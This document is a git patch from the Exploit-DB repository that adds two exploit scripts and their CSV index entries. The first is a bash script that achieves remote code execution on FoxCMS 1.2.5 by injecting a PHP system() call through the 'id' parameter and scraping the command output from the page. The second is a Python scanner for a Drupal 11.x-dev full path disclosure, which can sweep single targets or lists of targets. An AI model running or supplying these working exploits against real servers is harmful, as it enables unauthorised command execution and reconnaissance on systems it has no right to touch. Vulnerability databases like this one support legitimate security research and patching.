From 71bfc9b6c5b3eccfbf6a9509bc385b2155f4a6c4 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sun, 20 Apr 2025 00:16:27 +0000
Subject: [PATCH] DB: 2025-04-20

3 changes to exploits/shellcodes/ghdb

FoxCMS 1.2.5 - Remote Code Execution  (RCE)

Drupal 11.x-dev - Full Path Disclosure
---
 exploits/multiple/webapps/52267.bash | 63 ++++++++++++++++++
 exploits/php/webapps/52266.py        | 99 ++++++++++++++++++++++++++++
 files_exploits.csv                   |  2 +
 3 files changed, 164 insertions(+)
 create mode 100644 exploits/multiple/webapps/52267.bash
 create mode 100755 exploits/php/webapps/52266.py

diff --git a/exploits/multiple/webapps/52267.bash b/exploits/multiple/webapps/52267.bash
new file mode 100644
index 000000000..e4979ccdf
--- /dev/null
+++ b/exploits/multiple/webapps/52267.bash
@@ -0,0 +1,63 @@
+# Date: 2025-04-17
+# Exploit Title:
+# Exploit Author: VeryLazyTech
+# Vendor Homepage: https://www.foxcms.org/
+# Software Link: https://www.foxcms.cn/
+# Version: FoxCMS v.1.2.5
+# Tested on: Ubuntu 22.04, Windows Server 2019
+# CVE: CVE-2025-29306
+# Website: https://www.verylazytech.com
+
+#!/bin/bash
+
+banner() {
+cat <<'EOF'
+  ______     _______   ____   ___ ____  ____    ____   ___ _____  ___   __
+ / ___\ \   / / ____| |___ \ / _ \___ \| ___|  |___ \ / _ \___ / / _ \ / /_
+| |    \ \ / /|  _|     __) | | | |__) |___ \    __) | (_) ||_ \| | | | '_ \
+| |___  \ V / | |___   / __/| |_| / __/ ___) |  / __/ \__, |__) | |_| | (_) |
+ \____|  \_/  |_____| |_____|\___/_____|____/  |_____|  /_/____/ \___/ \___/
+
+__     __                _                      _____         _
+\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__
+ \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \
+  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
+   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
+                 |___/                  |___/
+
+
+                    @VeryLazyTech - Medium
+
+EOF
+
+}
+
+# Call the banner function
+banner
+
+set -e
+
+# Check for correct number of arguments
+if [ "$#" -ne 2 ]; then
+    printf "Usage: $0 <url> <command>"
+    exit 1
+fi
+
+TARGET=$1
+
+# Encode payload
+ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
+FULL_URL="${TARGET}?id=${ENCODED_CMD}"
+
+echo "[*] Sending RCE payload: $2"
+HTML=$(curl -s "$FULL_URL")
+
+# Extract <ul> from known XPath location using xmllint
+UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
+
+# Strip tags, clean up
+CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
+
+echo
+echo "[+] Command Output:"
+echo "$CLEANED"
\ No newline at end of file
diff --git a/exploits/php/webapps/52266.py b/exploits/php/webapps/52266.py
new file mode 100755
index 000000000..ecc5afbdd
--- /dev/null
+++ b/exploits/php/webapps/52266.py
@@ -0,0 +1,99 @@
+#!/usr/bin/env python
+# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
+# Date: 2025-04-16
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# MiRROR-H: https://mirror-h.org/search/hacker/49626/
+# Version: 11.x-dev
+# CVE: CVE-2024-45440
+
+# -*- coding:UTF-8 -*-
+import re
+import requests
+def banners():
+    cve_id = "CVE-2024-45440"
+    description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
+                  "core/authorize.php allows Full Path Disclosure (even
+when error logging is None) " \
+                  "if the value of hash_salt is file_get_contents of a file
+that does not exist."
+    disclaimer = "This tool is for educational purposes only. Any misuse of
+this information is the responsibility of " \
+                 "the person utilizing this tool. The author assumes no
+responsibility or liability for any misuse or " \
+                 "damage caused by this program."
+    width = 100
+    banner_top_bottom = "=" * width
+    banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
+    banner =
+f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
+
+    return banner
+def scan_single_url(url=None):
+    if url is None:
+        print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
+
+        url = input("[+] IP/Domain: ")
+    if not url.startswith('https://') and not url.startswith('http://'):
+        full_url = 'http://' + url + '/core/authorize.php'
+    print("[*] Scanning...")
+    try:
+        headers = {
+            "Host": url,
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
+rv:133.0) Gecko/20100101 Firefox/133.0",
+            "Accept":
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+            "Accept-Language":
+"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
+        }
+        response = requests.get(full_url, headers,timeout=10)
+        pattern = r'<em class="placeholder">(/.*?settings\.php)'
+        matches = re.findall(pattern, response.text)
+        # print(response.text)
+        if 'settings.php' in response.text:
+            print(f"[+] {url} Existed!")
+            for match in matches:
+                print("[+] The full path is:", match)
+                return True
+        else:
+            print(f"[-] {url} Not Exist!")
+            return False
+    except TimeoutError:
+        print(f"[-] {url} Timeout!")
+    except Exception as e:
+        print(f"[-] {url} Failed!")
+        return False
+def scan_multiple_urls():
+    print("[+] Input the path of txt Example: ./url.txt or
+C:\\the\\path\\to\\url.txt")
+    url_path = input("[+] Path: ")
+    url_list = []
+    result_list = []
+    try:
+        with open(url_path, 'r', encoding='utf-8') as f:
+            lines = f.readlines()
+            for line in lines:
+                url_list.append(line.strip())
+    except FileNotFoundError as e:
+        print("[-] File Not Found!")
+    for url in url_list:
+        result = scan_single_url(url)
+        if result:
+            result_list.append(url)
+    print("[+] Successful Target:")
+    for result in result_list:
+        print(f"[+] {result}")
+def main():
+    print(banners())
+    print("[1] Scan single url\n[2] Scan multiple urls")
+    choice = input("[+] Choose: ")
+    if choice == '1':
+        scan_single_url()
+    elif choice == '2':
+        scan_multiple_urls()
+    else:
+        print("[-] Invalid option selected!")
+    pass
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0e25002c9..eb116ea7a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11963,6 +11963,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple,,2021-03-01,2021-03-01,1,CVE-2021-3378,,,,,
 50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",2022-02-18,"Braiant Giraldo Villa",webapps,multiple,,2022-02-18,2022-02-18,0,CVE-2021-43062,,,,,
 51092,exploits/multiple/webapps/51092.sh,"FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass",2023-03-27,"Felipe Alcantara",webapps,multiple,,2023-03-27,2023-03-27,0,CVE-2022-40684,,,,,
+52267,exploits/multiple/webapps/52267.bash,"FoxCMS 1.2.5 - Remote Code Execution  (RCE)",2025-04-19,VeryLazyTech,webapps,multiple,,2025-04-19,2025-04-19,0,CVE-2025-29306,,,,,
 11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61919,,CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf,,,
 11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61918,,CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf,,,
 11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61920,,CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf,,,
@@ -17546,6 +17547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php,,2009-09-09,,1,OSVDB-61856;CVE-2009-4622,,,,,
 3207,exploits/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,webapps,php,,2007-01-26,2016-09-27,1,OSVDB-36619;CVE-2007-0572,,,,http://www.exploit-db.comdrunkengolem_alpha2.zip,
 51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
+52266,exploits/php/webapps/52266.py,"Drupal 11.x-dev - Full Path Disclosure",2025-04-19,"Milad karimi",webapps,php,,2025-04-19,2025-04-19,0,CVE-2024-45440,,,,,
 21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
 22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
 1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,